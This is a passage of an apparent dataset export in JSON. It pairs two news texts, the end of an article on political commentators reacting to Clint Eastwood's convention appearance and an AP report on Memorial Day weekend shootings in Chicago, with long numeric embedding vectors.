appearance by Clint Eastwood at the Republican convention — only broadened their smiles.\n\n“I thought that was awful,” Shrum said. “It was embarrassing for Eastwood; it ate into Romney’s time. I mean, that just wasn’t serious.”"},"embedding":{"kind":"list like","value":[-0.031934723258018494,-0.09294553846120834,0.010555479675531387,-0.03845832496881485,0.01225952710956335,0.09697935730218887,0.06303726136684418,0.005959463305771351,-0.013128583319485188,-0.007148980163037777,-0.04316260665655136,0.07730962336063385,0.055214595049619675,-0.04627486690878868,0.04857604578137398,0.03202143311500549,0.06497302651405334,0.005218768958002329,-0.028806833550333977,0.07505243271589279,-0.0548250786960125,-0.006834805943071842,0.09087345749139786,-0.09075523912906647,0.07696032524108887,-0.049063220620155334,0.0025191055610775948,-0.03088957816362381,-0.03710898384451866,0.03350337967276573,0.047540333122015,-0.01810172200202942,0.02352987974882126,-0.0025719404220581055,-0.04816120117902756,-0.054523129016160965,-0.059562161564826965,0.009485654532909393,0.07315181940793991,0.06907962262630463,-0.0010176908690482378,-0.07679662108421326,0.03205248340964317,0.004296448081731796,0.01935296133160591,0.04285365715622902,0.026028377935290337,0.005524073261767626,0.013303238898515701,0.005678181070834398,-0.045548029243946075,0.03814149275422096,0.06159809231758118,0.04025759920477867,0.01807502470910549,-0.006681694183498621,-0.07547498494386673,-0.017624178901314735,-0.06294291466474533,0.058691613376140594,0.015262638218700886,0.061114534735679626,-0.0012650059070438147,-0.0022386680357158184,-0.023674946278333664,0.0030651779379695654,-0.04616444185376167,0.006764492020010948,0.0009391044150106609,0.059662092477083206,0.14256878197193146,0.06201564520597458,-0.08009187877178192,0.0012739531230181456,0.03249848261475563,-0.05043068900704384,-0.01581951603293419,0.03187723830342293,0.026904508471488953,-0.0201322790235281,0.0009303264669142663,0.004463892430067062,-0.006131644826382399,0.11789242923259735,-0.001556388451717794,-0.03871958330273628,-0.025835558772087097,0.018813487142324448,-0.05049905553460121,0.11973637342453003,-0.12067340314388275,-0.004268574062734842,-0.08455964177846909,-0.02361513487994671,0.04422812536358833,0.015516403131186962,-0.0584663487970829,-0.013180918991565704,-0.11421894282102585,0.05406438559293747,-0.01193804107606411,0.08386921882629395,-0.05477388575673103,-0.037787750363349915,-0.022202689200639725,-0.00175095081795007,0.011844049207866192,0.08970192074775696,0.0010342765599489212,0.028135506436228752,0.020723652094602585,-0.000489517638925463,-0.021440671756863594,0.0285965446382761,0.015009719878435135,-0.14062117040157318,0.025143805891275406,0.019047636538743973,0.0025136168114840984,0.10307872295379639,0.021890001371502876,-0.014178884215652943,0.03222745284438133,-0.02175607718527317,0.013220971450209618,-0.025080634281039238,-0.0885954424738884,2.0215543894457135e-33,0.017894946038722992,0.0025248625315725803,0.041093479841947556,0.047757428139448166,-0.05616486072540283,0.09119979292154312,0.005126151256263256,-0.09901247173547745,-0.09312567114830017,-0.05402632802724838,-0.060004737228155136,0.0319397896528244,-0.058021266013383865,0.06310627609491348,0.01177392341196537,0.004005610477179289,0.01674484834074974,0.037647876888513565,-0.08258601278066635,-0.08540600538253784,-0.018977876752614975,0.031105762347579002,-0.02385139837861061,-0.07933200895786285,-0.006257903296500444,-0.027118323370814323,-0.00647930009290576,0.016430003568530083,-0.09147636592388153,0.006125272251665592,-0.06483327597379684,-0.026430372148752213,-0.055404648184776306,0.027517762035131454,-0.06869442760944366,-0.003843423444777727,-0.06667282432317734,0.025369703769683838,-0.008116153068840504,0.07914526015520096,-0.01333092711865902,0.04903855547308922,0.01762249320745468,0.026412097737193108,-0.03601083904504776,0.04529544338583946,0.018730465322732925,0.031829096376895905,-0.06933487951755524,0.021166816353797913,0.03446449711918831,0.0631672739982605,0.07838811725378036,-0.033380597829818726,-0.04129519686102867,0.01123904064297676,0.021493619307875633,-0.023638585582375526,-0.060210857540369034,0.0047793034464120865,0.017377182841300964,0.0011949719628319144,-0.04762982204556465,0.027417205274105072,-0.09150288999080658,-0.0062019480392336845,-0.05128681659698486,-0.07018167525529861,-0.023573892191052437,0.11138853430747986,0.08519744127988815,-0.03996151685714722,-0.07448995858430862,0.026723027229309082,0.017599010840058327,0.0012892729137092829,0.004791304003447294,0.004319851286709309,0.0914701595902443,-0.064583420753479,0.05872045457363129,-0.14489226043224335,0.05048563331365585,-0.11733205616474152,-0.04930084943771362,0.09697699546813965,0.05625971779227257,-0.038967594504356384,0.035102516412734985,0.021176327019929886,0.03144408017396927,-0.027146393433213234,-0.04712400212883949,0.03361203894019127,-0.07494524866342545,-3.6231208103899474e-33,-0.17852462828159332,-0.013712617568671703,-0.023264965042471886,0.016915936022996902,0.05142809450626373,-0.0118667371571064,0.0410645492374897,-0.01554415374994278,0.04547402262687683,0.012243663892149925,0.025386447086930275,-0.00017267480143345892,0.023777958005666733,-0.016590598970651627,0.03687428683042526,-0.09137146174907684,0.01327080000191927,-0.09607097506523132,0.029889939352869987,-0.012336169369518757,0.10040698945522308,0.09451494365930557,0.0007241596467792988,0.08945343643426895,-0.05494508147239685,-0.037671081721782684,-0.02456182986497879,0.018732950091362,0.006299970205873251,0.026530595496296883,-0.03314194455742836,-0.06351760029792786,0.02319776639342308,0.03772994503378868,0.06793350726366043,0.03926580771803856,-0.07392200082540512,-0.036353982985019684,0.04691695794463158,0.1199645921587944,0.035115111619234085,-0.0666426569223404,0.012821086682379246,-0.02142607420682907,0.0024296878837049007,0.1340484768152237,0.0016691499622538686,0.04920339956879616,-0.03666548430919647,0.020055528730154037,-0.08943889290094376,0.053867220878601074,-0.08924882858991623,0.09224920719861984,-0.022793300449848175,-0.02214789390563965,-0.08269800245761871,-0.006655918899923563,-0.00961974449455738,0.05152519419789314,-0.01445435918867588,0.059434469789266586,0.0025889426469802856,-0.023235084488987923,-0.028629541397094727,-0.0447428897023201,-0.023594340309500694,-0.07734199613332748,-0.061430424451828,0.04170084744691849,-0.03253886103630066,-0.0819631814956665,0.036678534001111984,-0.018335578963160515,-0.022612707689404488,0.02444695308804512,-0.02382727526128292,0.06551078706979752,-0.016417039558291435,-0.011885760352015495,-0.05251236632466316,-0.05443926900625229,-0.010551968589425087,-0.10055506229400635,0.008164199069142342,0.06368505954742432,0.05982541665434837,-0.01933608576655388,-0.041471268981695175,0.04610148444771767,0.015415465459227562,-0.012259705923497677,-0.06837280839681625,-0.019453328102827072,-0.11062795668840408,-5.543351733194868e-8,-0.04184047505259514,0.022918863222002983,-0.006080527789890766,0.05300427973270416,0.015364006161689758,0.059362106025218964,0.006711273919790983,-0.01796361431479454,0.07119587063789368,0.00042126825428567827,0.05700947344303131,-0.02513076923787594,-0.04436170682311058,0.013617478311061859,0.010422277264297009,-0.014983301982283592,-0.020396139472723007,-0.024743743240833282,-0.005449824035167694,-0.09434228390455246,0.04480661824345589,0.020542502403259277,0.013073131442070007,0.008526429533958435,0.020824268460273743,0.059400781989097595,-0.05209619551897049,0.09315503388643265,-0.02716790698468685,-0.022055460140109062,-0.027516750618815422,-0.018327994272112846,-0.06284689158201218,0.0024283290840685368,0.054688334465026855,0.060331299901008606,-0.0568249486386776,0.03480222448706627,0.1151188537478447,0.05647791549563408,0.0008507458260282874,0.007437145337462425,0.002903526648879051,0.043307624757289886,-0.02703958936035633,0.022002581506967545,0.0718759149312973,0.030346347019076347,-0.0020117873791605234,-0.012544253841042519,0.018802160397171974,0.018418924883008003,0.042349278926849365,-0.053274065256118774,0.04404867812991142,0.07051641494035721,-0.016239527612924576,-0.021002471446990967,-0.03207940608263016,-0.020458143204450607,0.009713616222143173,-0.06835044175386429,-0.08742336183786392,0.07037367671728134],"string":"[\n -0.031934723258018494,\n -0.09294553846120834,\n 0.010555479675531387,\n -0.03845832496881485,\n 0.01225952710956335,\n 0.09697935730218887,\n 0.06303726136684418,\n 0.005959463305771351,\n -0.013128583319485188,\n -0.007148980163037777,\n -0.04316260665655136,\n 0.07730962336063385,\n 0.055214595049619675,\n -0.04627486690878868,\n 0.04857604578137398,\n 0.03202143311500549,\n 0.06497302651405334,\n 0.005218768958002329,\n -0.028806833550333977,\n 0.07505243271589279,\n -0.0548250786960125,\n -0.006834805943071842,\n 0.09087345749139786,\n -0.09075523912906647,\n 0.07696032524108887,\n -0.049063220620155334,\n 0.0025191055610775948,\n -0.03088957816362381,\n -0.03710898384451866,\n 0.03350337967276573,\n 0.047540333122015,\n -0.01810172200202942,\n 0.02352987974882126,\n -0.0025719404220581055,\n -0.04816120117902756,\n -0.054523129016160965,\n -0.059562161564826965,\n 0.009485654532909393,\n 0.07315181940793991,\n 0.06907962262630463,\n -0.0010176908690482378,\n -0.07679662108421326,\n 0.03205248340964317,\n 0.004296448081731796,\n 0.01935296133160591,\n 0.04285365715622902,\n 0.026028377935290337,\n 0.005524073261767626,\n 0.013303238898515701,\n 0.005678181070834398,\n -0.045548029243946075,\n 0.03814149275422096,\n 0.06159809231758118,\n 0.04025759920477867,\n 0.01807502470910549,\n -0.006681694183498621,\n -0.07547498494386673,\n -0.017624178901314735,\n -0.06294291466474533,\n 0.058691613376140594,\n 0.015262638218700886,\n 0.061114534735679626,\n -0.0012650059070438147,\n -0.0022386680357158184,\n -0.023674946278333664,\n 0.0030651779379695654,\n -0.04616444185376167,\n 0.006764492020010948,\n 0.0009391044150106609,\n 0.059662092477083206,\n 0.14256878197193146,\n 0.06201564520597458,\n -0.08009187877178192,\n 0.0012739531230181456,\n 0.03249848261475563,\n -0.05043068900704384,\n -0.01581951603293419,\n 0.03187723830342293,\n 0.026904508471488953,\n -0.0201322790235281,\n 0.0009303264669142663,\n 0.004463892430067062,\n -0.006131644826382399,\n 0.11789242923259735,\n -0.001556388451717794,\n -0.03871958330273628,\n -0.025835558772087097,\n 0.018813487142324448,\n -0.05049905553460121,\n 0.11973637342453003,\n -0.12067340314388275,\n -0.004268574062734842,\n -0.08455964177846909,\n -0.02361513487994671,\n 0.04422812536358833,\n 0.015516403131186962,\n -0.0584663487970829,\n -0.013180918991565704,\n -0.11421894282102585,\n 0.05406438559293747,\n -0.01193804107606411,\n 0.08386921882629395,\n -0.05477388575673103,\n -0.037787750363349915,\n -0.022202689200639725,\n -0.00175095081795007,\n 0.011844049207866192,\n 0.08970192074775696,\n 0.0010342765599489212,\n 0.028135506436228752,\n 0.020723652094602585,\n -0.000489517638925463,\n -0.021440671756863594,\n 0.0285965446382761,\n 0.015009719878435135,\n -0.14062117040157318,\n 0.025143805891275406,\n 0.019047636538743973,\n 0.0025136168114840984,\n 0.10307872295379639,\n 0.021890001371502876,\n -0.014178884215652943,\n 0.03222745284438133,\n -0.02175607718527317,\n 0.013220971450209618,\n -0.025080634281039238,\n -0.0885954424738884,\n 2.0215543894457135e-33,\n 0.017894946038722992,\n 0.0025248625315725803,\n 0.041093479841947556,\n 0.047757428139448166,\n -0.05616486072540283,\n 0.09119979292154312,\n 0.005126151256263256,\n -0.09901247173547745,\n -0.09312567114830017,\n -0.05402632802724838,\n -0.060004737228155136,\n 0.0319397896528244,\n -0.058021266013383865,\n 0.06310627609491348,\n 0.01177392341196537,\n 0.004005610477179289,\n 0.01674484834074974,\n 0.037647876888513565,\n -0.08258601278066635,\n -0.08540600538253784,\n -0.018977876752614975,\n 0.031105762347579002,\n -0.02385139837861061,\n -0.07933200895786285,\n -0.006257903296500444,\n -0.027118323370814323,\n -0.00647930009290576,\n 0.016430003568530083,\n -0.09147636592388153,\n 0.006125272251665592,\n -0.06483327597379684,\n -0.026430372148752213,\n -0.055404648184776306,\n 0.027517762035131454,\n -0.06869442760944366,\n -0.003843423444777727,\n -0.06667282432317734,\n 0.025369703769683838,\n -0.008116153068840504,\n 0.07914526015520096,\n -0.01333092711865902,\n 0.04903855547308922,\n 0.01762249320745468,\n 0.026412097737193108,\n -0.03601083904504776,\n 0.04529544338583946,\n 0.018730465322732925,\n 0.031829096376895905,\n -0.06933487951755524,\n 0.021166816353797913,\n 0.03446449711918831,\n 0.0631672739982605,\n 0.07838811725378036,\n -0.033380597829818726,\n -0.04129519686102867,\n 0.01123904064297676,\n 0.021493619307875633,\n -0.023638585582375526,\n -0.060210857540369034,\n 0.0047793034464120865,\n 0.017377182841300964,\n 0.0011949719628319144,\n -0.04762982204556465,\n 0.027417205274105072,\n -0.09150288999080658,\n -0.0062019480392336845,\n -0.05128681659698486,\n -0.07018167525529861,\n -0.023573892191052437,\n 0.11138853430747986,\n 0.08519744127988815,\n -0.03996151685714722,\n -0.07448995858430862,\n 0.026723027229309082,\n 0.017599010840058327,\n 0.0012892729137092829,\n 0.004791304003447294,\n 0.004319851286709309,\n 0.0914701595902443,\n -0.064583420753479,\n 0.05872045457363129,\n -0.14489226043224335,\n 0.05048563331365585,\n -0.11733205616474152,\n -0.04930084943771362,\n 0.09697699546813965,\n 0.05625971779227257,\n -0.038967594504356384,\n 0.035102516412734985,\n 0.021176327019929886,\n 0.03144408017396927,\n -0.027146393433213234,\n -0.04712400212883949,\n 0.03361203894019127,\n -0.07494524866342545,\n -3.6231208103899474e-33,\n -0.17852462828159332,\n -0.013712617568671703,\n -0.023264965042471886,\n 0.016915936022996902,\n 0.05142809450626373,\n -0.0118667371571064,\n 0.0410645492374897,\n -0.01554415374994278,\n 0.04547402262687683,\n 0.012243663892149925,\n 0.025386447086930275,\n -0.00017267480143345892,\n 0.023777958005666733,\n -0.016590598970651627,\n 0.03687428683042526,\n -0.09137146174907684,\n 0.01327080000191927,\n -0.09607097506523132,\n 0.029889939352869987,\n -0.012336169369518757,\n 0.10040698945522308,\n 0.09451494365930557,\n 0.0007241596467792988,\n 0.08945343643426895,\n -0.05494508147239685,\n -0.037671081721782684,\n -0.02456182986497879,\n 0.018732950091362,\n 0.006299970205873251,\n 0.026530595496296883,\n -0.03314194455742836,\n -0.06351760029792786,\n 0.02319776639342308,\n 0.03772994503378868,\n 0.06793350726366043,\n 0.03926580771803856,\n -0.07392200082540512,\n -0.036353982985019684,\n 0.04691695794463158,\n 0.1199645921587944,\n 0.035115111619234085,\n -0.0666426569223404,\n 0.012821086682379246,\n -0.02142607420682907,\n 0.0024296878837049007,\n 0.1340484768152237,\n 0.0016691499622538686,\n 0.04920339956879616,\n -0.03666548430919647,\n 0.020055528730154037,\n -0.08943889290094376,\n 0.053867220878601074,\n -0.08924882858991623,\n 0.09224920719861984,\n -0.022793300449848175,\n -0.02214789390563965,\n -0.08269800245761871,\n -0.006655918899923563,\n -0.00961974449455738,\n 0.05152519419789314,\n -0.01445435918867588,\n 0.059434469789266586,\n 0.0025889426469802856,\n -0.023235084488987923,\n -0.028629541397094727,\n -0.0447428897023201,\n -0.023594340309500694,\n -0.07734199613332748,\n -0.061430424451828,\n 0.04170084744691849,\n -0.03253886103630066,\n -0.0819631814956665,\n 0.036678534001111984,\n -0.018335578963160515,\n -0.022612707689404488,\n 0.02444695308804512,\n -0.02382727526128292,\n 0.06551078706979752,\n -0.016417039558291435,\n -0.011885760352015495,\n -0.05251236632466316,\n -0.05443926900625229,\n -0.010551968589425087,\n -0.10055506229400635,\n 0.008164199069142342,\n 0.06368505954742432,\n 0.05982541665434837,\n -0.01933608576655388,\n -0.041471268981695175,\n 0.04610148444771767,\n 0.015415465459227562,\n -0.012259705923497677,\n -0.06837280839681625,\n -0.019453328102827072,\n -0.11062795668840408,\n -5.543351733194868e-8,\n -0.04184047505259514,\n 0.022918863222002983,\n -0.006080527789890766,\n 0.05300427973270416,\n 0.015364006161689758,\n 0.059362106025218964,\n 0.006711273919790983,\n -0.01796361431479454,\n 0.07119587063789368,\n 0.00042126825428567827,\n 0.05700947344303131,\n -0.02513076923787594,\n -0.04436170682311058,\n 0.013617478311061859,\n 0.010422277264297009,\n -0.014983301982283592,\n -0.020396139472723007,\n -0.024743743240833282,\n -0.005449824035167694,\n -0.09434228390455246,\n 0.04480661824345589,\n 0.020542502403259277,\n 0.013073131442070007,\n 0.008526429533958435,\n 0.020824268460273743,\n 0.059400781989097595,\n -0.05209619551897049,\n 0.09315503388643265,\n -0.02716790698468685,\n -0.022055460140109062,\n -0.027516750618815422,\n -0.018327994272112846,\n -0.06284689158201218,\n 0.0024283290840685368,\n 0.054688334465026855,\n 0.060331299901008606,\n -0.0568249486386776,\n 0.03480222448706627,\n 0.1151188537478447,\n 0.05647791549563408,\n 0.0008507458260282874,\n 0.007437145337462425,\n 0.002903526648879051,\n 0.043307624757289886,\n -0.02703958936035633,\n 0.022002581506967545,\n 0.0718759149312973,\n 0.030346347019076347,\n -0.0020117873791605234,\n -0.012544253841042519,\n 0.018802160397171974,\n 0.018418924883008003,\n 0.042349278926849365,\n -0.053274065256118774,\n 0.04404867812991142,\n 0.07051641494035721,\n -0.016239527612924576,\n -0.021002471446990967,\n -0.03207940608263016,\n -0.020458143204450607,\n 0.009713616222143173,\n -0.06835044175386429,\n -0.08742336183786392,\n 0.07037367671728134\n]"}}},{"rowIdx":1297,"cells":{"text":{"kind":"string","value":"CHICAGO (AP) — Gun violence has marked the unofficial start of summer in Chicago, where dozens have been shot and six have been killed over Memorial Day weekend.\n\nThe Chicago Tribune reports a total of 15 people were shot overnight into Tuesday, two fatally. The newspaper says those shootings bring the total number shot since Friday to 68.\n\n–Attorney General Announces Official Investigation into Chicago Police Department\n\n–Bernie Sanders Calls Out Chicago Officials over Handling of Laquan McDonald Case\n\nChicago police say final numbers will be released later Tuesday.\n\nPolice had announced plans to step up patrols throughout the city in an effort to prevent violence that occurred during Memorial Day weekend last year, when a dozen people were killed and 44 more were hurt.\n\nCopyright 2016 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed."},"embedding":{"kind":"list like","value":[0.06458404660224915,0.004389723297208548,0.04999221861362457,-0.010041164234280586,0.12958329916000366,0.05789276584982872,-0.015436613000929356,-0.0006806048331782222,-0.04382859915494919,0.05955452844500542,0.09427045285701752,0.08037140220403671,-0.0511043481528759,-0.06392316520214081,-0.02153843641281128,-0.05857153609395027,0.054167527705430984,-0.05480308085680008,-0.03870978578925133,-0.006286491174250841,-0.0422498919069767,-0.056633155792951584,0.07109200954437256,0.03000502847135067,-0.031672485172748566,-0.0204346664249897,-0.029978586360812187,-0.04646456614136696,0.007624519523233175,-0.003026943886652589,0.026341937482357025,-0.026541147381067276,-0.0377684086561203,0.02790728211402893,0.022960316389799118,-0.10657421499490738,0.0641709491610527,0.018765820190310478,0.012900320813059807,0.06188123673200607,0.06125352904200554,-0.005271072033792734,0.020458107814192772,0.012110181152820587,0.0018592339474707842,0.014313731342554092,-0.10671206563711166,0.012300790287554264,0.043445006012916565,0.028694264590740204,0.04875589907169342,0.020960303023457527,-0.048907071352005005,0.04147620126605034,-0.00587113481014967,-0.07903170585632324,-0.036728788167238235,-0.012570369057357311,0.03405288606882095,0.07603494077920914,-0.0513777881860733,0.01336907222867012,-0.037319764494895935,-0.036104653030633926,0.02386304922401905,0.057319168001413345,-0.017735902220010757,-0.07697384804487228,0.045333556830883026,0.06225784868001938,0.1130419597029686,0.0780664011836052,0.029948733747005463,0.019174054265022278,-0.07903627306222916,-0.02192024700343609,0.02066109888255596,-0.010012694634497166,0.08068346977233887,-0.03476285561919212,0.07591487467288971,-0.08953003585338593,0.05167814716696739,-0.015296709723770618,-0.02869199588894844,0.0032774133142083883,-0.055709462612867355,0.03631281480193138,0.03092106617987156,-0.022641388699412346,-0.04880118742585182,0.039007965475320816,0.0134280351921916,-0.015695761889219284,-0.003012059722095728,0.06193355843424797,-0.06645744293928146,0.062361616641283035,-0.03496066480875015,-0.0067502958700060844,-0.008413394913077354,0.01628696732223034,0.047012027353048325,-0.1261374056339264,0.02180768921971321,0.02176111377775669,-0.048098769038915634,-0.025908488780260086,-0.07270935922861099,0.004088917281478643,0.09426462650299072,0.06272576004266739,0.05854303017258644,-0.0007818115409463644,0.09150604903697968,-0.04252566024661064,0.012371628545224667,0.04103409871459007,0.006531469523906708,-0.06049264594912529,0.05226390063762665,0.01435368973761797,-0.00607161084190011,-0.004184628836810589,-0.028030434623360634,0.05765445902943611,0.016831116750836372,4.8876684091786236e-33,0.03397495672106743,-0.0967104583978653,0.028344376012682915,-0.010985122062265873,0.04640498757362366,-0.11385028809309006,0.036763887852430344,0.04645582661032677,0.056246206164360046,0.006565071642398834,-0.046318817883729935,-0.13688108325004578,-0.0169838834553957,0.033222898840904236,-0.0050740898586809635,-0.002275909297168255,0.06020847707986832,0.06418152153491974,-0.044017862528562546,0.02181006222963333,-0.0003071756800636649,-0.09797320514917374,-0.058178242295980453,0.04430273920297623,0.007838510908186436,0.08309464156627655,-0.002242130460217595,0.12632131576538086,0.0012289519654586911,-0.024464644491672516,0.009401901625096798,0.06070903688669205,0.07414755970239639,0.09243899583816528,0.12278704345226288,-0.04497712850570679,0.08035294711589813,0.0545584000647068,-0.03386963903903961,-0.09711246192455292,0.007279819343239069,0.06700899451971054,-0.09035125374794006,-0.06774812936782837,0.006249737925827503,0.013936800882220268,-0.033038049936294556,-0.05311620235443115,-0.065264992415905,-0.030115853995084763,0.04393627122044563,-0.0000010171247595280875,-0.03829272463917732,0.04936642199754715,-0.047687530517578125,0.05424303188920021,-0.09357396513223648,-0.07865018397569656,0.06682019680738449,0.05949593335390091,0.07272718101739883,0.11022751033306122,-0.020138878375291824,-0.06295507401227951,0.03009381890296936,-0.010920130647718906,-0.01649179868400097,0.005717913620173931,0.04787848889827728,0.01660819537937641,0.06430811434984207,-0.028994372114539146,-0.008804123848676682,-0.10678265243768692,0.05035009607672691,0.012784650549292564,0.04257546365261078,-0.02232424169778824,0.007944468408823013,0.09219539165496826,0.03823092207312584,0.0033405886497348547,0.013397241942584515,0.049157917499542236,0.06950724124908447,0.039170920848846436,-0.014339117333292961,-0.02598385512828827,-0.09017173945903778,-0.009891673922538757,-0.036617908626794815,-0.034566644579172134,-0.009358174167573452,0.06654620170593262,-0.06969330459833145,-7.13823058767062e-33,-0.06490936130285263,0.00971525814384222,-0.06786796450614929,-0.015197476372122765,-0.000026750894903670996,-0.058068592101335526,-0.03969790041446686,-0.007863922044634819,0.07031510025262833,-0.03042139858007431,-0.028055641800165176,-0.04714803025126457,-0.022860867902636528,0.0650375708937645,0.014156706631183624,-0.0567675419151783,-0.03176726773381233,0.0408167727291584,-0.10595397651195526,0.021890917792916298,0.027510682120919228,-0.04532989487051964,0.011088315397500992,0.05831946060061455,0.0521194152534008,0.0578978955745697,0.07143645733594894,-0.0021702826488763094,-0.03982839360833168,-0.017273234203457832,0.02270415984094143,-0.0434398353099823,0.0729495957493782,0.023182008415460587,-0.05155761539936066,0.043244682252407074,0.10311967879533768,-0.0090713482350111,0.0232035331428051,-0.01908411644399166,0.05116504058241844,-0.011958427727222443,0.0059855966828763485,-0.021124765276908875,-0.074537493288517,0.011361520737409592,0.024762624874711037,0.03468168526887894,-0.07971271127462387,0.008914700709283352,-0.07928962260484695,-0.0468456856906414,-0.12075145542621613,0.08378275483846664,-0.05348461493849754,-0.052884962409734726,0.05740048363804817,-0.06247398629784584,-0.014101198874413967,0.006640219129621983,-0.01066768541932106,0.051949676126241684,-0.10177650302648544,0.06552018225193024,0.03005426749587059,-0.05163361877202988,-0.032201241701841354,-0.1123383417725563,-0.04921304062008858,-0.04010525345802307,0.009793523699045181,0.00221763807348907,-0.053559478372335434,0.027194447815418243,-0.10399213433265686,-0.039828311651945114,0.016218438744544983,0.033400408923625946,-0.0613148994743824,0.08545996993780136,0.023152679204940796,-0.11143968999385834,-0.0365133136510849,0.06024113669991493,-0.02867211401462555,-0.01024443656206131,0.08876778930425644,-0.010874862782657146,-0.027271369472146034,0.07224507629871368,-0.05301259458065033,-0.040916528552770615,0.005073759239166975,0.015029476955533028,-0.10740817338228226,-5.447512307910074e-8,0.03723035380244255,0.00903273280709982,-0.03797195851802826,-0.05478207767009735,-0.0054087769240140915,-0.018310291692614555,-0.04379578307271004,0.016719505190849304,0.01235521212220192,-0.002447334583848715,0.07508361339569092,0.024264566600322723,-0.04561956226825714,-0.023885006085038185,-0.0764048621058464,-0.08249721676111221,-0.021363846957683563,-0.05250125750899315,-0.019821524620056152,-0.0036701487842947245,-0.03391916677355766,-0.017186753451824188,-0.028094898909330368,0.04696723073720932,0.10456999391317368,0.02545216679573059,-0.0569000169634819,0.05925358086824417,-0.04017714411020279,0.074803926050663,-0.055839695036411285,0.014149484224617481,-0.005997766274958849,-0.015198692679405212,0.06734568625688553,-0.028217684477567673,0.05248836800456047,-0.008465589955449104,0.00018536890274845064,-0.05074327439069748,-0.08459141105413437,-0.042875178158283234,-0.0174569021910429,0.01869504153728485,0.02937963604927063,-0.047437623143196106,-0.015720803290605545,-0.046137645840644836,-0.010118800215423107,-0.005689868703484535,-0.04415386542677879,-0.08500976860523224,-0.003971382509917021,0.0021314446348696947,0.0174851231276989,-0.020884491503238678,-0.03351036086678505,-0.019608955830335617,0.04965759441256523,-0.06107421964406967,0.0478137768805027,-0.01401993166655302,-0.04065994918346405,0.03220662847161293],"string":"[\n 0.06458404660224915,\n 0.004389723297208548,\n 0.04999221861362457,\n -0.010041164234280586,\n 0.12958329916000366,\n 0.05789276584982872,\n -0.015436613000929356,\n -0.0006806048331782222,\n -0.04382859915494919,\n 0.05955452844500542,\n 0.09427045285701752,\n 0.08037140220403671,\n -0.0511043481528759,\n -0.06392316520214081,\n -0.02153843641281128,\n -0.05857153609395027,\n 0.054167527705430984,\n -0.05480308085680008,\n -0.03870978578925133,\n -0.006286491174250841,\n -0.0422498919069767,\n -0.056633155792951584,\n 0.07109200954437256,\n 0.03000502847135067,\n -0.031672485172748566,\n -0.0204346664249897,\n -0.029978586360812187,\n -0.04646456614136696,\n 0.007624519523233175,\n -0.003026943886652589,\n 0.026341937482357025,\n -0.026541147381067276,\n -0.0377684086561203,\n 0.02790728211402893,\n 0.022960316389799118,\n -0.10657421499490738,\n 0.0641709491610527,\n 0.018765820190310478,\n 0.012900320813059807,\n 0.06188123673200607,\n 0.06125352904200554,\n -0.005271072033792734,\n 0.020458107814192772,\n 0.012110181152820587,\n 0.0018592339474707842,\n 0.014313731342554092,\n -0.10671206563711166,\n 0.012300790287554264,\n 0.043445006012916565,\n 0.028694264590740204,\n 0.04875589907169342,\n 0.020960303023457527,\n -0.048907071352005005,\n 0.04147620126605034,\n -0.00587113481014967,\n -0.07903170585632324,\n -0.036728788167238235,\n -0.012570369057357311,\n 0.03405288606882095,\n 0.07603494077920914,\n -0.0513777881860733,\n 0.01336907222867012,\n -0.037319764494895935,\n -0.036104653030633926,\n 0.02386304922401905,\n 0.057319168001413345,\n -0.017735902220010757,\n -0.07697384804487228,\n 0.045333556830883026,\n 0.06225784868001938,\n 0.1130419597029686,\n 0.0780664011836052,\n 0.029948733747005463,\n 0.019174054265022278,\n -0.07903627306222916,\n -0.02192024700343609,\n 0.02066109888255596,\n -0.010012694634497166,\n 0.08068346977233887,\n -0.03476285561919212,\n 0.07591487467288971,\n -0.08953003585338593,\n 0.05167814716696739,\n -0.015296709723770618,\n -0.02869199588894844,\n 0.0032774133142083883,\n -0.055709462612867355,\n 0.03631281480193138,\n 0.03092106617987156,\n -0.022641388699412346,\n -0.04880118742585182,\n 0.039007965475320816,\n 0.0134280351921916,\n -0.015695761889219284,\n -0.003012059722095728,\n 0.06193355843424797,\n -0.06645744293928146,\n 0.062361616641283035,\n -0.03496066480875015,\n -0.0067502958700060844,\n -0.008413394913077354,\n 0.01628696732223034,\n 0.047012027353048325,\n -0.1261374056339264,\n 0.02180768921971321,\n 0.02176111377775669,\n -0.048098769038915634,\n -0.025908488780260086,\n -0.07270935922861099,\n 0.004088917281478643,\n 0.09426462650299072,\n 0.06272576004266739,\n 0.05854303017258644,\n -0.0007818115409463644,\n 0.09150604903697968,\n -0.04252566024661064,\n 0.012371628545224667,\n 0.04103409871459007,\n 0.006531469523906708,\n -0.06049264594912529,\n 0.05226390063762665,\n 0.01435368973761797,\n -0.00607161084190011,\n -0.004184628836810589,\n -0.028030434623360634,\n 0.05765445902943611,\n 0.016831116750836372,\n 4.8876684091786236e-33,\n 0.03397495672106743,\n -0.0967104583978653,\n 0.028344376012682915,\n -0.010985122062265873,\n 0.04640498757362366,\n -0.11385028809309006,\n 0.036763887852430344,\n 0.04645582661032677,\n 0.056246206164360046,\n 0.006565071642398834,\n -0.046318817883729935,\n -0.13688108325004578,\n -0.0169838834553957,\n 0.033222898840904236,\n -0.0050740898586809635,\n -0.002275909297168255,\n 0.06020847707986832,\n 0.06418152153491974,\n -0.044017862528562546,\n 0.02181006222963333,\n -0.0003071756800636649,\n -0.09797320514917374,\n -0.058178242295980453,\n 0.04430273920297623,\n 0.007838510908186436,\n 0.08309464156627655,\n -0.002242130460217595,\n 0.12632131576538086,\n 0.0012289519654586911,\n -0.024464644491672516,\n 0.009401901625096798,\n 0.06070903688669205,\n 0.07414755970239639,\n 0.09243899583816528,\n 0.12278704345226288,\n -0.04497712850570679,\n 0.08035294711589813,\n 0.0545584000647068,\n -0.03386963903903961,\n -0.09711246192455292,\n 0.007279819343239069,\n 0.06700899451971054,\n -0.09035125374794006,\n -0.06774812936782837,\n 0.006249737925827503,\n 0.013936800882220268,\n -0.033038049936294556,\n -0.05311620235443115,\n -0.065264992415905,\n -0.030115853995084763,\n 0.04393627122044563,\n -0.0000010171247595280875,\n -0.03829272463917732,\n 0.04936642199754715,\n -0.047687530517578125,\n 0.05424303188920021,\n -0.09357396513223648,\n -0.07865018397569656,\n 0.06682019680738449,\n 0.05949593335390091,\n 0.07272718101739883,\n 0.11022751033306122,\n -0.020138878375291824,\n -0.06295507401227951,\n 0.03009381890296936,\n -0.010920130647718906,\n -0.01649179868400097,\n 0.005717913620173931,\n 0.04787848889827728,\n 0.01660819537937641,\n 0.06430811434984207,\n -0.028994372114539146,\n -0.008804123848676682,\n -0.10678265243768692,\n 0.05035009607672691,\n 0.012784650549292564,\n 0.04257546365261078,\n -0.02232424169778824,\n 0.007944468408823013,\n 0.09219539165496826,\n 